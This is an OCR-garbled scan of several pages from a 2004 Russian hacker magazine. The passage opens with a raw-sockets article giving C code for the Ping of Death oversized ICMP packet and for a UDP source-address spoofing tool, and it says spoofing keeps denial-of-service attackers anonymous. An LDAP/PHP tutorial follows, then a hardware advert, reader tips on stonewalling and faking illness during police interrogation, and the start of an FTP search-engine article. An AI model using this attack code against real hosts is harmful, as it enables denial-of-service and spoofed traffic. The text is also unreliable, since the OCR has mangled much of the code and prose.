ли. В 1996 году РСЮ помог славно повесе- 
литься многим товарищам. И хотя сейчас 
большинство операционок на такой понт не 
возьмешь, стоит все-таки взглянуть, как это 
делается. Вдруг кто-нибудь да выпустит ин- 
тернет-холодильник или швейную машинку с 
неотлаженным ІР-стеком? Только представь 
себе, сколько протухших супов, гнилых око- 
роков, а также рубашек с наглухо зашитыми 
карманами и рукавами обещает нам такой 
поворот событий. Поэтому приступим. 

По адресу ѵѵѵѵѵѵ.іпзесиге.огд/зріоііз/ріпд-о- 
(ЫІШпІ находится описание РСЮ вместе с 
примером его использования. Чтобы не 
изобретать велосипед, обратимся к приве- 
денному там исходнику, который был напи- 
сан еще в далеком 96. 

— ■ 



ВРС 791 , описывающий протокол ІР -\ллллллТадз.огд/гТсз/гТс791 .НТтІ 
ВРС 792, все об ІСМР - \ллллллТадз.огд/гТсз/гТс792 . НТтІ 
ВРС 768, ІЮР для чайников - ѵ\лллллТад5.огд/гісз/гіс768.Н4тІ 
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Для отсылки произвольного пакета нужно 
выделить под него кусок памяти, а затем, 
правильно заполнив заголовок и добавив 
данные, отослать. Опыт показывает, что де- 
лать это все руками довольно сложно. Риск 
составить неправильный заголовок, из-за ко- 
торого пакет будет зарублен локально, очень 
велик. Поэтому для определения заголовка 
пакета лучше использовать специальные 
структуры, зігисі ір дает доступ ко всем нуж- 
ным полям, поэтому, "натянув" ее на буфер, 
можно не беспокоиться за правильность 
формата. Точно так же можно работать и со 
структурой пакета ІСМР, для которого име- 
ется свой тип зігисі істрйсіг: 



ір->ір_Ш = 255; 

ір->ір_р = 1; 

Й$1.5іп_ас1(1г = ір->ір_(Ы; 

(Шпіатііу = АР_ШЕТ; 

Отсылка производится одним вызовом 
зепсЙо(). В приведенном выше исходнике 
цикл применяется исключительно для того, 
чтобы послать большой пакет по фрагмен- 
там. Есть у ІР и такая возможность. Дело в 
том, что 65535 байт - ограничение не только 
для принимающей стороны. При попытке 
послать пакет большего размера любая сис- 
тема ответит отказом, а реггог() скажет: 
"Меззаде іоо Іопд". 



сііаг ЬиШБОО]; 

зігисі ір *ір = (зігисі ір *)Ри(; 

зігисі ІстрМг Істр = (зігисі істрМг *Нір * I); 

В самом начале, где открывается сокет, 
мы видим заветную константу - 50СК ВА\Л/. 
Она говорит о том, что мы работаем с гаѵѵ 
зоскеіз, то есть с "сырыми” сокетами. Слово 
"сырые" здесь означает степень готовности, 
а не относительную влажность :). То есть мы 
сами будем конструировать пакеты протоко- 
ла. Это, в свою очередь, означает, что если 
при отсылке ІЮР или установлении соедине- 
ний по ТСР система обычно сама занимается 
проставлением нужных полей - даты, адреса 
отправки и назначения, контрольной суммы 
и прочего, то в случае с гаѵѵ забота обо всем 
этом перекладывается на крепкие плечи 
программиста: 



і( (($ = зоскеКАР.Ш, 50СКШ, 

ІРРВОТО.ІСМР 

))<0){ 

реггог("зоскеІ"); 

Кстати, в ІІІЧІХ создание таких сокетов 
дозволяется исключительно пользователю 
гооі. Поэтому работать придется от него. Ну, 
или компилировать от себя, а запускать че- 
рез зигіо, кому как нравится. 



р->ір_ѵ = 4; 

р->ір_(іІ = зйеоі *ір » 2; 
р->ір_Іоз = 0; 
р->ір_Іеп = Р1Х($йео( Ьиі); 
р->ір_М = іііопз(4321); 
р->ір_о(І = ГІХ(О); 




Рог (оЯзеІ = 0; оЯзеІ < 65536; оЯзеІ += (зйеоі Ьи< - зігеоР *ір)) { 
ір->ір_о(1 = НВДІзеІ » 3); 

ІР (оРРзеі < 65120) 
ір->ір_о(Р |= РІХ(ІР_МР); 
еізе 

ір->ір_Іеп = РІХ(418); /* таке РоРаі 65538 */ 
і( (зепйРоІз. ЬиР, зііеоР ЬиР, 0, (зігисі зоскабсіг *)&с!$1, 
зйеоі Йзі) < 0) { 

ІргіпЩзМегг, "оРРзеІ %і . ", оРРзеІ); 
еггогС'зепйІо"); 

В отличие от стандартной утилиты ріпд, 
программа не показывает полученные отве- 
ты. Послав пакет, она сразу выходит. Ведь 
жизнь коротка, и всех ответов все равно не 
получишь :). Несмотря на это, проверить, 
посылается ли что-то, вполне возможно. 
Смело запускай Ісрбитр. В экспериментах с 
гаѵѵ зоскеіз он тебе здорово пригодится. 

А 5Р00ГМС 

Еще одно хорошее применение для гаѵѵ 
зоскеіз - спуфинг. Он же - подстановка ле- 
вых адресов отправки, благодаря которым 
атакуемая система думает, что пакет был 
послан кем-то другим. Скажем, можно выз- 
вать Ро5, посылая кучу ІЮР и ІСМР какому- 
нибудь уязвимому хосту. При этом в адресе 
отправки будет значиться тісго$оЯ.сот или 
сервер общества инвалидов умственного 
труда, и пострадавшей стороне будет весь- 
ма непросто найти концы. 

Чтобы подставить левый адрес отправле- 
ния, мы воспользуемся полем ір згс структу- 
ры зігисі ір. Спуфить будем ІЮР, как прото- 
кол, не требующий установления соедине- 
ния, для чего напишем собственную програ- 




МОМ КИНО 




МАМ -КИНО 

на іуфйЬах 






^ 8 ^ 

л Некоторым 
умельцам удава- 
лось спуфить ТСР 
соединения с сис- 
темами, начинаю- 
щими нумерацию 
пакетов с опреде- 
ленного числа. 
Отсылая пакеты 
"вслепую", они 
знали, какой ісі 
ожидает получить 
ТСР-стек ;). 

л Некоторые лич- 
ности отрицатель- 
но относятся к ата- 
кам ОоЗ, даже к 
тем, которые про- 
изведены с приме- 
нением спуфинга. 
Более того, за от- 
дельные подвиги 
тебя могут нака- 
зать ;). 




ммку. Поэтому приготовься к нескольким 
минутам жестокого кодинга с минимумом 
объяснений. Включай мозги :). 

Для начала подключим необходимые заго- 
ловки - зМіо.Іі, зМІІЬ.Іі, зІгіпд.Н, пеМЬ.б, 
зуз/зоскеі.б, пеііпеі/ір.б, пеііпеі/исір.іі. Об 
их назначении говорят их же имена, поэтому 
перейдем к собственно отсылающей пакет 
функции зепбраск(). Она будет выглядеть так: 

ѵоігі зепДрасКсопз! сііаг ‘Ііозі, сопзі сііаг *зоигсе, іпі рог!) { 
сопзі сіиг 'гіаіа = "М, МагІіапзДп": 

Теперь нам осталось только отмерить бу- 
фер нужной длины, "натянуть" на него струк- 
туры заголовков ІР и ІЮР пакетов и... честно 
говоря, еще много осталось :), но давай пока 
разберемся с буферами и заголовками. 

сіиг МІзиеоКзІгисІ ір) + зігеоКзІшсІ ийрМг) * $1гІеп(сІаІа)]: 
зігисі ір *ір = (зігисі ір *) Ьиб 

зігисі игірікіг *игір = (зігисі игіріігіг *) (ЬиГ + зігеоДзІгисІ ір»: 
зігисі зоскагШМп Йзі; 
зігисі Іюзіепі *1ір: 

Создаем сокет: 

іпі зоск; 

ІІ((зоск = зоскеІ(АР_Ш, 30СК_КА\Ѵ, ІРРКОТО_КАѴѴ)) < 0) { 

еггогС'зоскеІ"): 

геіигп: 

Заполняем поля ІР заголовков перед за- 
пуском в открытый космос: 

ір->ір_ііі = 5: 
ір->ір_ѵ = 4: 
ір->ір_!о$ = 0: 

ір->ір_Іеп « Моп5($І2еоІ($Ігис( ір) * зігеоКзІгис! ийрббг) + 

зігіеп(гіаіа)); 

ір->ір_ігІ = 0: 

ір->ір_о(( = 0: 

ір->ір_Ш = 64: 

ір->ір_р = ірршо.ііор: 

ір->ір_$ит = 0: 



Как резолвить адреса отправителя и полу- 
чателя груза, ты разберешься и сам (или по- 
любопытствуешь в исходнике), а мы пойдем 
дальше. Итак, заголовки ІЮР: 

ікір->іоіігсе = Іііопз(ббб); 
ік1р->(1е$1 = ІіІоп$(рогІ): 

и4р->Іеп = ІіІопзІзігеоКзІгисІ ікІрМг) * $ІгІеп(гІаІа)); 
шір->сііеск = 0: 

Содержимое пакета, приветствие братьям 
по разуму: 

гпеглсруОшР + $ігео((з(пісІ ір) * зігеоКзІгисІ ибрікіг). гіаіа, 
$1г1еп№1а)): 

Кладем адрес назначения для $епсІІо() в сізі: 

й$1.5іп_асігіг = Ір->Ір_Й5І: 

(1$1.$іп_1аті1у = АГШ; 

И наконец, эти жестокие строки отправят 
на орбиту наше творение: 

зепйоізоск, ЬиТ. зігеоКзІгисІ ір) + зігеоКзІгисІ ибріпіг) + 
зігіепійаіа), 0, (зігисі зоскагМг *) Ш, аігеоКіМ)): 
реггог("$епгІІо''): 

} 

Не забудем и про таіп(), задачей которо- 
го будет прочтение небольшой лекции по 
использованию, в случае если не все пара- 
метры командной строки были заданы. 

іпі таіп(іп! агдс, сііаг ”агдѵ) { 

ІІ(агдс != 4) { 

ргіпИСІІзаде: %$ йе$І $гс рог(\п", агдѵ[01): 

) еІ$е { 

$епгІраск(агдѵ[1], агдѵ[2], аІоі(агд*[ЗВ): 

} 

геіигп 0: 

} 

Проверить ее работоспособность можно с 
помощью хорошо знакомой всем любителям 




сетевого хака программы пеісаі, которая, по- 
мимо всего прочего, умеет принимать ІЮР. 

$ пс -ІП 2 Ѵ -р 5000 

Запустим от руга наш шедевр: 

И ізрооМр Іосаііюзі Ьідіііз.сот 5000 

После чего пеісаі выдаст нам следующее: 

Кесеіѵеіі раскеі кот 208.17.8.183:666 -> 127.0.0.1:5000 (Іосаі) 

№. Магііапз! 

Работает! Теперь разберемся, как. На са- 
мом деле все просто. Пакет состоит из заго- 
ловка ІР, за ним следует заголовок ІЮР, а 
после идут непосредственно данные. В са- 
мом начале функции зепсІраск() отмеряется 
буфер нужного размера. Затем с использова- 
нием структур зігисі ір и зігисі ибріігіг прямо 
в буфере заполняются нужные поля, в ре- 
зультате чего он становится похожим на пакет 
ІЮР. В самом конце прицепляются данные - 
строка "Тіі, МаПіапз!\п''. Привет марсианам. 

В итоге перед посылкой буфер выглядит так: 

[ зігисі ір ] [ зігисі пйрікіг ] [ Йаіа ) 

Подготовив адрес отправки в сізі, вызыва- 
ем зепсйоО, и процесс пошел. О результатах 
процесса на родной английской мове нам 
сразу же доложит реггог(). 

Описания всех полей пакетов можно най- 
ти в комментариях к стандартным хедерам, 
которые обычно лежат в /изг/іпсіисіе/пеііпеі/. 
Функция Мопз() используется для перевода 
числовых значений из формата конкретной 
машины в унифицированный сетевой фор- 
мат. Ведь архитектуры у процессоров быва- 
ют разные, а понимать друг друга в Сети 
должны все. 

Занимаясь спуфингом, не стоит ожидать 
от хостов ответов. Высылаться они будут по 
ІР, указанным в заголовке, поэтому ты ничего 
не получишь. По этой же причине невозмож- 
но спуфить ТСР/ІР соединения. Тот, кто хочет 
быть незамеченным, соединяясь по ТСР, 
пользуется сменными адресами, проброса- 
ми, виртуальными сетями и прочими наворо- 
тами. Поэтому если тебе нужна двунаправ- 
ленная коммуникация, спуфинг не годится. 

Впрочем, это не повод огорчаться. Поду- 
май, сколько сервисов, ездящих на ІЮР, 
сразу же выполняют присланные команды 
или записывают данные в логи и базы дан- 
ных без всякой проверки обратной связи. 
Спуфинг широко применяется в атаках типа 
Ро5, когда, забрасывая хост пакетами, ата- 
кующий хочет сохранить свою анонимность. 

Зная, как работать с гаи зоскеіз, можно 
сконструировать свою, улучшенную :) версию 
пакета любого протокола. Поэтому изучай ВРС, 
препарируй сетевые сервисы, и кто знает, мо- 
жет быть, ты станешь автором первого эксплой- 
та для интернет-холодильника соседа? ЗС 
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Новый журнал 
о компьютерном 
железе 




от создателей Хакер'а 




В ПРОДАЖЕ 





И НЕ ЗАБУДЬ: 



ТВОЯ МАМА БУДЕТ В ШОКЕ 





о всех предыдущих статьях я описывал различные приемы и методы построения динамических сайтов - мы учились выделять общие 
части в дизайне сайта, работать с базами данных, абстрагировать рбр-код от разметки страницы. Чаще всего в своих системах дпя 
хранения информации мы использовали базы данных - это очень удобно, быстро и наглядно. Но сегодня мне захотелось отойти 
немного в сторону и рассказать тебе об альтернативных системах хранения данных. Быть может, ты откроешь дпя себя какую-то новую 
возможность, которая позволит тебе реализовать задумку более эффективно? 



кодинг 



ХПКЕР/№03(БЗ)/2004 



храни информацию по-н иному! 



а 



■ж- 

л На нашем диске 
ты найдешь пос- 
леднюю версию 
ОрепЮАР, ОЮВМ и 
ВОВ, подробные 
мануалы по этим 
системам, а также 
описание ЮАР Арі 
вРНРи еще кучу 
необходимой ин- 
формации. 



А НПДО ЗИЯТЬ ЕГО В пицо 

П режде всего сформулируем 

поставленную задачу. Требует- 
ся система эффективного 
представления данных, кото- 
рая позволяла бы осущес- 
твлять полноценный доступ к 
хранимой информации, не нак- 
ладывала ограничений на ее 
объем, не была жестко привязана к какому- 
либо инструменту разработки, обладала дос- 
таточной масштабируемостью и в силу внут- 
ренней архитектуры наиболее четко подхо- 
дила бы к решению поставленной задачи. 

В самом деле, недальновидно было бы 
хранить данные в каком-то экзотическом 
формате, исходя лишь из удобства доступа 
к ним из используемой в данный момент 
системы. Ведь может потребоваться реали- 
зовать программу на другом языке - в этом 
случае данные, скорее всего, придется кон- 
вертировать в какой-то новый формат. Это 
повлечет за собой дополнительные траты 
времени, неизбежные ошибки и еще кучу 
проблем, о которых ты можешь сперва даже 
и не подозревать. Но когда заваришь всю 
эту кашу, будет уже поздно, и придется 
срочно клепать какие-то заплатки. 
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До сих пор мы довольно успешно работа- 
ли с сервером БД тузці. Бесплатно, удобно, 
не слишком медленно, универсально - прос- 
то панацея от всех бед. Инструмент, вернее 
технология, о которой я тебе сейчас расска- 
жу, в общем-то, создавался совсем для дру- 
гих целей. Прошу любить и жаловать - служ- 
ба каталогов ШАР. 

А НЕМНОГО ИСТОРИИ 

Прежде всего, что же такое "служба катало- 
гов"? Это программный комплекс для хране- 
ния и каталогизации информации, т.е. пре- 
образования ее в древовидную разветвлен- 
ную структуру. В общем-то, тут прослежива- 
ется некоторая аналогия с обычной базой 
данных, но в нашем случае упор делается на 
чтение данных, а не на их добавление или 
модификацию - именно операция чтения ре- 
ализуется здесь быстрее всего. Само собой, 
использовать такое представление целесооб- 
разно лишь для больших объемов данных, 
которые будут модифицироваться не слиш- 
ком часто. Баннерная система - не наш паци- 
ент, наш - справочник "Желтые страницы”. 

Общеизвестный пример такой службы - 
РМ5. Это распределенная база данных, ин- 
формация в которой физически размещается 
на многих тысячах (сотнях тысяч?) серверов. 



Причем все машинки связаны в единую сис- 
тему, так что клиенту одного компьютера дос- 
тупны сведения, хранящиеся на другом узле, 
который может находиться на противополож- 
ной стороне земного шара на дне океана :). 

Впрочем, это примитивный пример ката- 
логизации информации: объекты в такой ба- 
зе имеют ограниченное количество атрибу- 
тов - в нашем случае это доменное имя, ІР- 
адрес, адреса МХ-серверов и т.д. 

Само собой, служба директорий с инфор- 
мацией о сотрудниках какой-нибудь серьез- 
ной организации может содержать более 
разнообразные данные и иметь гораздо бо- 
лее сложную и, возможно, запутанную струк- 
туру - тут все зависит от проектировщика и 
его профессионализма. 

Служба каталогов по определению должна 
предоставлять простой централизованный ин- 
терфейс для доступа к данным, который мо- 
жет использоваться самыми разными прило- 
жениями. Протокол, по которому могла бы ра- 
ботать такая служба, был разработан в 150 
(Іпіегпаііопаі Зіапбагіігаііоп Огдапііаііоп), и ему 
был присвоен идентификатор Х.500. Первона- 
чально он назывался БАР (Оігесіогу Ассезз 
РгоіосоІ). В принципе, протокол был не так уж 
и плох - в нем была предложена гибкая и лег- 
ко расширяемая информационная структура, 



юпр нп службе у каталогов 




позволявшая хранить почти любой тип дан- 
ных. Однако эта разработка не прижилась из- 
за ряда серьезных технических ограничений, 
связанных с коммуникационным уровнем. Ре- 
шение этих проблем вылилось в создание но- 
вого протокола - ШАР (УдМдадМ Игесіогу 
Ассезз РгоіосоІ), который работал уже на 
ТСР/ІР и в связи с этим мог легко расширять- 
ся и безболезненно модернизироваться. 

На сегодняшний день существует нес- 
колько реализаций этого протокола от про- 
изводителей софта, наиболее известные из 
которых: Асііѵе Регесіогу от Місгозой, 
Рігесіогу Зегѵісе от №ізсаре и продукт ІМоѵеІІ 
с одноименным названием. 

Но это все коммерческие продукты, для 
нас малоинтересные. Из бесплатных, пос- 



тавляемых открытым кодом, наибольшее 
распространение получил проект ОрепШАР - 
именно его мы и рассмотрим. 

А СЛЕНГ 

Чтобы двигаться дальше, тебе придется 
подучить сленг - ведь во всякой технологии 
есть термины, которые применительно к 
контексту могут иметь самое неожиданное 
значение :). 

Информация каталога хранится в виде объ- 
ектов, или так называемых "сущностей" 

(епігу), состоящих из специальных полей, ко- 
торые называются атрибутами (айгіЬиіез). На- 
бор атрибутов, их синтаксис и правила поиска 
задаются схемой каталога (зсбете); каждый 
объект каталога идентифицируется уникаль- 



ным ключом - РИ (Різііпдиізбесі Мате). Дан- 
ные в каталоге представлены в виде древо- 
видной структуры - РІТ (Рігесіогу Іпіогтаііоп 
Тгее). Вершиной такого дерева (очевидно, де- 
рева общего вида) является корневой объект 
(Вооі Епігу), "папа" всех остальных. РМ корне- 
вого объекта одновременно является суффик- 
сом всего каталога. 

Каждый последующий объект - "сын" - в 
структуре каталога идентифицируется уни- 
кальным значением РМ, который указывает 
путь к объекту в каталоге. Если провести ана- 
логию с файловой системой, то РМ любого 
объекта также включает РМ всех объектов, 
стоящих выше по иерархии. Отличие же зак- 
лючается лишь в том, что РМ формируется не 
слева направо, как путь к файлу, а наоборот - 
справа налево. 

РМ администратора каталога (Вооі 
Різііпдиізбесі Мате)- это специальный объект, 
задающий параметры администратора катало- 
га. Этот объект указывается в конфигурации 
сервера, но может и отсутствовать 
в самом каталоге. К такому объекту не приме- 
няются списки доступа (АСЦ. 

База поиска, ВРМ (Вазе Різііпдиізііесі 
Мате) - это объект каталога, начиная с кото- 
рого производится поиск. Дело в том, что ча- 
ще всего нет необходимости ворошить все 
дерево, чтобы найти какой-то элемент - целе- 
сообразнее ограничить область поиска, указав 
в запросе базу. По умолчанию этот параметр 
соответствует суффиксу каталога, т.е. по де- 
фолту поиск производится во всем дереве. 

.ішпновкііореішмр 

Сервер ОрепШАР поставляется открытыми 
кодами и доступен для свободного скачива- 
ния с официального сайта системы - 
иѵѵѵѵ.орепісіар.огд. Ты также найдешь последнюю 
версию ОрепШАР на СЭ. Собрать систему 
можно почти под любым Ііпіх'ом, более то- 
го, некоторые хостинг-провайдеры осущес- 
твляют поддержку этой технологии на своих 
площадках. 

Установка системы - малопримечатель- 
ное событие: 



СТАВИМ ОРЕШР 



$ Іаг Х2«( орепІсІар-2.2.5.1<|2 
$ ісопіідііге -епаЫе-ШЬт -ѵ»Ші-ІсІЬт-арі=д(1Ьт 
$ таке 

$ ей іе$1$; таке 
$ ей 

в таке іпзіаіі 

Настройку и конфигурацию сервера я здесь 
описывать не буду - в комплекте с исходника- 
ми, как обычно, идет хороший мануал. Лучше 
опишу некоторые основные функции ШАР Арі 
в РНР, с помощью которых мы и напишем 
несложное приложение для примера. 

^ШПРПРІВРНР 

* Ійар_соппесІ(["узел"], [порт]). Эта 

функция устанавливает соединение с ука- 
занным сервером ШАР. Обрати внима- 
ние, что оба параметра необязательны - 
если опущен первый, возвращается деск- 
риптор уже открытого соединения, если 
же опущен второй аргумент - программа 
будет подключаться на порт по умолча- 
нию, 389. В случае успеха возвращается 
указатель на соединение - 




а На сегодняшний 
день существует 
несколько реали- 
заций протокола 
ЮАР от произво- 
дителей софта, на- 
иболее известные 
из которых: Асііѵе 
Регесіогу от 
МісгозоИ, Рігесіогу 
Зегѵісе от Ыеізсаре 
и продукт МоѵеІІ с 
одноименным наз- 
ванием. 







л Для полноценной 
установки 
О реп ЮАР необхо- 
димо наличие в 
системе одного из 
следующих серве- 
ров баз данных: 
СЭВМ или 
ВегкеІеуОВ. Обе БД 
поставляются отк- 
рытыми кодами, и 
ты можешь скачать 
их из Сети либо 
взять с диска. 



положительное число, если же произошла 
ошибка, функция вернет код Іаізе. 

* Шар_Ьіпс1(соединение, РЫ, па- 
роль). Функция устанавливает права доступа 
в текущем соединении, осуществляя привязку 
с некоторому каталогу с заданным ЭИ и паро- 
лем. Следует заметить, что оба параметра 
могут быть опущены - в этом случае наша 
клиентская программа попробует зарегистри- 
роваться на сервере анонимно - некоторые 
администраторы, желая расшарить какую-то 
информацию всем пользователям сети, дают 



ЭТИ СПИТЫ ТЫ ДОЛЖЕН ПОСЕТИТЬ. ВСЕ. И БЫСТРО 



>\ллллл/.с5.исзс1.ес1и/дгоир5/Мрс1/арр1е5/риЬз/пес97.р5 
л \ллллл/.ореп1с1ар.огд 

^йр://йр.гіс-есИог.огд/іп-поІез/гіс2255.Ь<1: 
>йр://йр.гіс-есІІДог.огд/іп-поДе5/г1с2830.Ь<1: 
а НаКоз.зДгееМѵ. пеІ/ПЬ/рНр/Типсйоп . ІсІар-зеагсІі . рНр . Міт 
а рНр4уои.кіеѵ.иа/сІосз/рппѴрНр4/ге1ІсІар.МтІ 
а Ма№оз.зІгееІ-ѣ/.пеІ/ІіЬ/рИр/гекІсІар.рІір.МтІ 



такую возможность. 

* І.сІар_8еагсН(соединение, база по- 
иска, фильтр, атрибуты). Функция осуще- 
ствляет поиск по дереву, база поиска задает- 
ся вторым аргументом. Третий параметр - 
строковый и служит некоторым шаблоном, по 
которому происходит отбор элементов из де- 
рева. Здесь можно довольно гибко с исполь- 
зованием булевой алгебры указывать интере- 
сующие узлы дерева. Более подробно об 
этом и о синтаксисе построения шаблонов ты 
можешь почитать в документации к ШАР, ко- 
торую найдешь на диске. Последний, четвер- 
тый параметр - массив с именами атрибутов 
узла дерева, которые нас интересуют. Ведь 
каждый элемент может иметь множество ат- 
рибутов, в то время как при поиске нас ре- 
ально могут интересовать лишь некоторые из 
них - так зачем занимать память лишней ин- 
формацией? Отказ от использования этого 
параметра - моветон в сетевом программиро- 
вании под службы ШАР :). 

Пожалуй, все. Разумеется, я не привел здесь 
значительную часть всех функций, даже мини- 
мального набора не привел - цель была не в 
этом. Я так подробно рассмотрел несколько 
функция из ШАР Арі, чтобы ты понял саму кон- 
цепцию этой службы, лучше усвоил основные 
термины. А описание функций... Во-первых, на 
СР лежит исчерпывающий мануал по этому по- 



воду, а во-вторых, лучше будет разобраться со 
всем этим на практике, не так ли? 

А ПРИМЕР СИСТЕМЫ ІЛПР-РНР 

Не хочется писать что-то сложное и большое, 
ты и без того уже, чувствую, запарился. Давай 
напишем... да чего там, адресную книгу с воз- 
можностью поиска и модификации данных. Сам 
понимаешь - задача банальная, но раз уж мы 
формально впервые столкнулись с этой техно- 
логией, будем двигаться не слишком быстро. 

Да и потом, дело не в размерах системы - по- 
няв, как функционируют такие сценарии, ты без 
проблем реализуешь нечто более глобальное. 
Главное - понять концепцию :). 

Наша директория - записная книжка - 
будет представлять собой дерево, каждый 
"этаж" которого - своего рода папка. Корневой 
элемент связан с несколькими другими - это 
разделы нашей записной книги, например "лич- 
ное", "работа”, "семья" и т.д. В каждом таком 
каталоге есть множество элементов, каждый из 
которых имеет достаточное для нас количество 
атрибутов (имя, телефон, мыло, адрес). 

Система должна позволять осуществлять 
поиск информации по имени абонента, добав- 
лять новых и модифицировать уже имеющих- 
ся. Также было бы неплохо встроить возмож- 
ность создания новых папок в телефонной 




книге - вдруг ты захочешь организовать еще 
одно тайное общество? :) 

На этом давай остановимся - килобайтный 
резерв исчерпан, код с комментариями - на 
врезке, ты разберешься. Но на бумаге, к сожале- 
нию, поместилась далеко не вся система, а лишь 
маленький кусочек :). Полный вариант забирай с 
диска. Удачи, будут вопросы - пиши. 



ТІР53ТІ?ІСИі5 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес 5кІуагоѵ@геаІ.хакер.ги. 
Ведущий рубрики Тір$5Тгіск$ Иван Скляров. 



л Как вести себя на допросе. Советы от знающего человека. 

1. Молчание - золото. Молчи как можно дольше. Зайдя в каби- 
нет к следаку, ты, скорее всего, увидишь серьезного дядьку, 
который заполняет бумаги, не обращая внимания на тебя. Ни 
в коем случае не начинай разговор первым. Кто качал гово- 
рить, тот и проиграл. Это старый КГБшный прием. 

2. Делай паузы перед ответом. Причем чем длиннее, тем луч- 
ше. Во-первых, это снизит темп беседы, а, следовательно, и 
накаленность. Во-вторых, даст время подумать над ответом. 

3. Не смотри в глаза. Это правило одно из основных Если ты 
не чувствуешь в себе грандиозной силы, то лучше не испы- 
тывать судьбу. Выдержать взгляд тренированного человека 
совсем непросто, а проигрыш в этой игре приведет к боль- 
шим моральным потерям. Смотри вниз. На руки или на стол. 

4. Отвлекись и успокойся. Желательно еще до начала разго- 
вора взять в руки мелкий предмет. Ручку, пуговицу или край 
рукава. Когда ты начнешь нервничать, руки будут трястись, а 
это нехорошо. Также мелкий предмет отвлекает внимание и 
вводит в микротранс твоего собеседника. Желательно чтобы 
движения были ритмичными и повторялись с периодич- 
ностью. Не вздумай сам попасться на этот прием. Если сле- 
дователь крутит в руках четки или отстукивает ритм ручкой 
по столу переведи свое внимание на другой предмет. Напри- 
мер, начни изучать свои ногти, а мысленно напевать люби- 
мую мелодию. 

5. Не проси. Ни в коем случае ничего не проси. Фразы "дай- 
те, пожалуйста", "разрешите" и т.д. выбрось из головы. По- 
меняй их на "где взять", "на чем писать", будь вежлив, но не 
унижайся. 

6. Не бойся. Если тебя допрашивают, значит им что-то нужно. 
Признание ты можешь написать в любой момент, но отка- 
заться от него будет сложнее. Тебя будут убеждать, упраши- 
вать, пугать Не вступай в дискуссии. Только отвечай на воп- 
росы, на риторические вопросы отвечай про себя. 

7. Притворяйся. Коси на свое плохое здоровье, теряй созна- 
ние. Такое поведение очень испугает твоих "друзей". И при- 
ятней ночевать в больничной палате, чем в камере. Я знаю 
случай, когда один пронырливый хлюпик грамотно имитиро- 
вал сердечный приступ. При этом у него даже пульс не про- 
щупывался. Кроме всего прочего, тебе может повезти, и де- 
ло будет вести неопытный следах у которого может появить- 
ся чувство сострадания. Тогда все, ты в дамках. Это еще луч- 
ше, чем оправдательный приговор. Дело до суда может прос- 
то не дойти. 

8. Одним из методов воздействия является подсадка в каме- 
ру к уголовникам. Почти все новички раскалываются на этом 
испытании и готовы подписать что угодно, лишь бы не ны- 
рять в парашу головой и не быть подстилкой под своим со- 
камерником. По этому поводу я советов дать не могу, смот- 
ри сам, как себя вести. 

Будут вопросы по этой или другой теме, обращайся. Попыта- 
юсь помочь... 

СуЬег Саі 
пе*5-саІроі(®уапбех.ги 
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Центральный вентилятор 

Круговое охлаждение 

Вход охлаждающего воздуха сверху и со стороны основания 



Низкий уровень шумаь 



Блок регулировки для управления частотой вращения вентилятора 



и уровнем шума 

Выносной регулятор частоты вращения(устанавливается в отсек 3,5” 
дисковода на передней панели или на планку отсека РСІ на задней панели) 




Легкость 



■ Множество полых ребер со встроенными тепловыми трубками в 4 направлениях 

■ Общая масса всего 430 г 



Изящный дизайн 



Радиатор уникальной конструкции 
Привлекательные светодиодные индикаторы 



Универсальность 

• Подходит для процессоров ІпІеГ 



* 

\/ АіЫоп " ХР 

г< 



РепШт* 4 и АМЮ АТЫоп" 64/ 




ІГ? 




Простая установка без использования инструментов 



ен-рсигі-ѵе 

"НідН-ТесЬ Осзаг" 
Тессепігаі 



ОН-РСІІ21-ѴО 

"Іппоѵаііоп АѵѵагсІ 2004 & 



НідЫу КесоттепсІесГ 



он-рсигі-ѵе 

"Есіііог'з СНоісе" 
РС 2000 






Комплект поставки 

к Устройство охлаждения СН-РСІІ21-Ѵ6 
к Теплопроводящая паста 

* Регулятор частоты вращения на панели для 3,5” отсека 

* Планка для отсека РСІ задней панели 

* Комплект крепежных скоб для процессоров Р4, К7 и К8 

* Кабель питания 



СёВІТ 

НАРѵІІЧОѴЕП 
18. - 24.03.2004 

Посетите наш стенд НаІІ23, А20 



• 61САВѴТЕ не гарантирует работоспособности системы на этих ч; 

- Спецификации и иллюстрации могут быть изменены без предв; 

- Все товарные знаки и логотипы являются собственностью их э 

- Любое превышение номинальных частот системы предпринима 
страх и риск. Компания 6іда-ВуІе ТесНпоІоду не несет ответсті 
повреждения или нестабильную работу процессора, системно! 



^п. 2004 Ѳегтапу ОС ѴѴогкЬепсЬ РеЬ. 2004 Таіѵѵап 

Зап. 2004 Зіпдароге 



6/^гси/е- */оиг ѵѵѵѵѵѵ.дідаЬуіе. сот / ѵѵѵѵѵѵ.дідаЬуіе. ги 



* Винты 

* Руководство пользователя на 1 0 языках 



С ІС АВУ ТЕ 

ТЕСНМОБОСУ 









■ Докучаев Дмитрий ака РогЬ (іогЬ@геаІ.хакер.ш) 



ПИШЕМ ПОИСКОВУЮ СИСТЕМУ 



спи ты хочешь, чтобы тебя уважапи пользователи твоей локальной сети, в которой существуют свои іір-архивы, - подари ин 
поисковик по покапке. Система, которая будет осуществлять поиск нужного файла на (1р-серверах сети - бопее чем реальность. 
Опгоритм работы такого поисковика очень прост и реализуется всего за несколько часов легкого кодинга. 




л На нашем диске 
ты найдешь скрип- 
ты для поисковой 
системы и патчен- 
ный модуль 
Несиг5іѵе.рш. 



С ама система состоит из двух 
частей. Это собственно ѵѵеЬ- 
интерфейс, работающий нап- 
рямую с туЗОЦ а также индек- 
сатор всех файлов в архивах, 
с помощью которого данные 
в базе будут периодически 
обновляться. Писать все будем 
на РегГе - самом простом и в то же время 
функциональном языке. 

Л КПКЭТО РПБОТПЕТ? 

Давай рассмотрим самое главное - алго- 
ритм работы поисковика. Прежде чем что- 
либо кодить, ты должен выпросить у всех, 
кто желает засветить свой РТР’шник на тво- 
ем поисковике, аккаунт к серверу. С его по- 
мощью будем индексировать заголовки фай- 
лов. Второй проблемой будет установка нуж- 
ного программного обеспечения. В нашем 
случае это РегІ и его модули: РТР::Весигзіѵе, 
ОВйсМузрІ, а также база данных МуЗСП. 

Но это так, вводная. Самое главное - 
понять принцип интеграции индексатора и 
ѵгеб-интерфейса. Он на удивление прост :). 
Итак, после рекурсивного процесса индек- 
сирования заголовков всех файлов с РТР- 
серверов, происходит запись в базу дан- 
ных. Записывать будем следующие пара- 



метры: имя файла, путь к файлу и размер 
файла (что еще надо для счастья?). Таким 
образом, индексатор нужен только для об- 
работки РГР-серверов. 

Теперь о ѵѵеЬ-интерфейсе. Скрипт 
